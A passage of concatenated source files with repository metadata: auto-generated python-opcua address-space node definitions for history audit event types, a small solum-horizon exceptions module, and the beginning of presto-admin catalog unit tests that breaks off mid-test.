ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3033, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3033, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3012, 0)
node.BrowseName = QualifiedName('AuditHistoryDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(2104, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3012, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3027, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3012, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2104, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3027, 0)
node.BrowseName = QualifiedName('UpdatedNode', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdatedNode")
attrs.DataType = ua.NodeId(ua.ObjectIds.NodeId)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3027, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3027, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3027, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3014, 0)
node.BrowseName = QualifiedName('AuditHistoryRawModifyDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryRawModifyDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3015, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3016, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3017, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3034, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3015, 0)
node.BrowseName = QualifiedName('IsDeleteModified', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("IsDeleteModified")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3015, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3015, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3015, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3016, 0)
node.BrowseName = QualifiedName('StartTime', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("StartTime")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3016, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3016, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3016, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3017, 0)
node.BrowseName = QualifiedName('EndTime', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("EndTime")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3017, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3017, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3017, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3034, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3034, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3034, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3034, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3019, 0)
node.BrowseName = QualifiedName('AuditHistoryAtTimeDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryAtTimeDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3019, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3020, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3019, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3021, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3019, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3020, 0)
node.BrowseName = QualifiedName('ReqTimes', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3019, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReqTimes")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3020, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3020, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3020, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3019, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3021, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3019, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3021, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3021, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3021, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3019, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3022, 0)
node.BrowseName = QualifiedName('AuditHistoryEventDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryEventDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3022, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3023, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3022, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3024, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3022, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3023, 0)
node.BrowseName = QualifiedName('EventIds', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3022, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("EventIds")
attrs.DataType = ua.NodeId(ua.ObjectIds.ByteString)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3023, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3023, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3023, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3022, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3024, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3022, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(920, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3024, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3024, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3024, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3022, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(891, 0)
node.BrowseName = QualifiedName('Annotation', 0)
node.NodeClass = NodeClass.DataType
node.ParentNodeId = NumericNodeId(22, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.DataTypeAttributes()
attrs.DisplayName = LocalizedText("Annotation")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(891, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(22, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(890, 0)
node.BrowseName = QualifiedName('ExceptionDeviationFormat', 0)
node.NodeClass = NodeClass.DataType
node.ParentNodeId = NumericNodeId(29, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.DataTypeAttributes()
attrs.DisplayName = LocalizedText("ExceptionDeviationFormat")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(890, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(7614, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(890, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(29, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(7614, 0)
node.BrowseName = QualifiedName('EnumStrings', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(890, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("EnumStrings")
attrs.DataType = ua.NodeId(ua.ObjectIds.LocalizedText)
attrs.Value = [LocalizedText('AbsoluteValue'),LocalizedText('PercentOfValue'),LocalizedText('PercentOfRange'),LocalizedText('PercentOfEURange'),LocalizedText('Unknown')]
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(7614, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(7614, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(7614, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(890, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(893, 0)
node.BrowseName = QualifiedName('Default Binary', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(891, 0)
node.ReferenceTypeId = NumericNodeId(38, 0)
node.TypeDefinition = NumericNodeId(76, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("Default Binary")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(38, 0)
ref.SourceNodeId = NumericNodeId(893, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(891, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(39, 0)
ref.SourceNodeId = NumericNodeId(893, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(8244, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(893, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(76, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(892, 0)
node.BrowseName = QualifiedName('Default XML', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(891, 0)
node.ReferenceTypeId = NumericNodeId(38, 0)
node.TypeDefinition = NumericNodeId(76, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("Default XML")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(38, 0)
ref.SourceNodeId = NumericNodeId(892, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(891, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(39, 0)
ref.SourceNodeId = NumericNodeId(892, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(8879, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(892, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(76, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(15382, 0)
node.BrowseName = QualifiedName('Default JSON', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(891, 0)
node.ReferenceTypeId = NumericNodeId(38, 0)
node.TypeDefinition = NumericNodeId(76, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("Default JSON")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(38, 0)
ref.SourceNodeId = NumericNodeId(15382, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(891, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(15382, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(76, 0)
refs.append(ref)
server.add_references(refs)
|
iirob/python-opcua
|
opcua/server/standard_address_space/standard_address_space_part11.py
|
Python
|
lgpl-3.0
| 125,106
| 0.000767
|
# Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
#from solumclient.openstack.common.apiclient import exceptions as solumclient
NOT_FOUND = exceptions.NOT_FOUND
RECOVERABLE = exceptions.RECOVERABLE
# + (solumclient.ClientException,)
UNAUTHORIZED = exceptions.UNAUTHORIZED
|
rackerlabs/solum-horizon
|
solumdashboard/exceptions.py
|
Python
|
apache-2.0
| 854
| 0.001171
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
tests for catalog module
"""
import os
import fabric.api
from fabric.operations import _AttributeString
from mock import patch
from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase
class TestCatalog(BaseUnitCase):
def setUp(self):
super(TestCatalog, self).setUp(capture_output=True)
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_not_exist(self, isfile_mock):
isfile_mock.return_value = False
self.assertRaisesRegexp(ConfigurationError,
'Configuration for catalog dummy not found',
catalog.add, 'dummy')
@patch('prestoadmin.catalog.validate')
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isfile')
def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
isfile_mock.return_value = True
catalog.add('tpch')
filenames = ['tpch.properties']
deploy_mock.assert_called_with(filenames,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
validate_mock.assert_called_with(filenames)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
@patch('prestoadmin.catalog.os.listdir')
@patch('prestoadmin.catalog.validate')
def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
deploy_mock):
catalogs = ['tpch.properties', 'another.properties']
listdir_mock.return_value = catalogs
catalog.add()
deploy_mock.assert_called_with(catalogs,
get_catalog_directory(),
constants.REMOTE_CATALOG_DIR,
PRESTO_STANDALONE_USER_GROUP)
@patch('prestoadmin.catalog.deploy_files')
@patch('prestoadmin.catalog.os.path.isdir')
def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
isdir_mock.return_value = False
self.assertRaisesRegexp(ConfigFileNotFoundError,
r'Cannot add catalogs because directory .+'
r' does not exist',
catalog.add)
self.assertFalse(deploy_mock.called)
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
@patch('prestoadmin.catalog.os.remove')
def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
'then rm /etc/presto/catalog/tpch.properties ; '
'else echo "Could not remove catalog \'tpch\'. '
'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
exists_mock.return_value = True
fabric.api.env.host = 'localhost'
catalog.remove('tpch')
sudo_mock.assert_called_with(script)
local_rm_mock.assert_called_with(get_catalog_directory() +
'/tpch.properties')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_failure(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
out = _AttributeString()
out.succeeded = False
sudo_mock.return_value = out
self.assertRaisesRegexp(SystemExit,
'\\[localhost\\] Failed to remove catalog tpch.',
catalog.remove,
'tpch')
@patch('prestoadmin.catalog.sudo')
@patch('prestoadmin.catalog.os.path.exists')
def test_remove_no_such_file(self, exists_mock, sudo_mock):
exists_mock.return_value = False
fabric.api.env.host = 'localhost'
error_msg = ('Could not remove catalog tpch: No such file ' +
